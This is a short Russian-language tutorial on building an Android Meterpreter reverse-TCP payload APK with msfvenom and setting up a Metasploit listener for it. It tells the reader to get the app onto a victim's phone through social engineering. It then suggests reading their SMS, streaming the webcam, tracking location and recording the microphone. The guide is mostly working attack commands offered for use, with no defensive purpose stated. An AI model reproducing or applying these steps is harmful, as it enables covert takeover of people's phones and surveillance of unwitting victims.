Создание пэйлоада с помощью msfvenom и обратной сессии tcp android.

Одним из интересных трюков является обратная сессия tcp android.

Все, что вам нужно, это создать небольшой пэйлоад с помощью msfvenom.

# msfvenom -p android / meterpreter / reverse_tcp LHOST = {ВАШ IP-АДРЕС} LPORT = 4444 R> /root/FILENAME.apk

{ВАШ IP ADDRESS} может быть вашим локальным IP-адресом или публичным IP-адресом.

Если вы хотите использовать общедоступный IP-адрес и взломать WAN, вам необходимо настроить перенаправление портов на маршрутизаторе, который может быть заблокирован вашим интернет-провайдером.

Он будет генерировать приложения для Android.

Вам необходимо доставить это приложение с помощью Социальной инженерии на устройство жертвы.

Перед доставкой начните прослушивать порт 4444:
# msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.123 //local ip
set LPORT 4444
exploit

Когда жертва установит этот .apk, ваш сеанс будет запущен в терминале:

Много интересного, что вы можете сделать с помощью meterpreter, например dump_sms, webcam_stream, geolocate, record mic.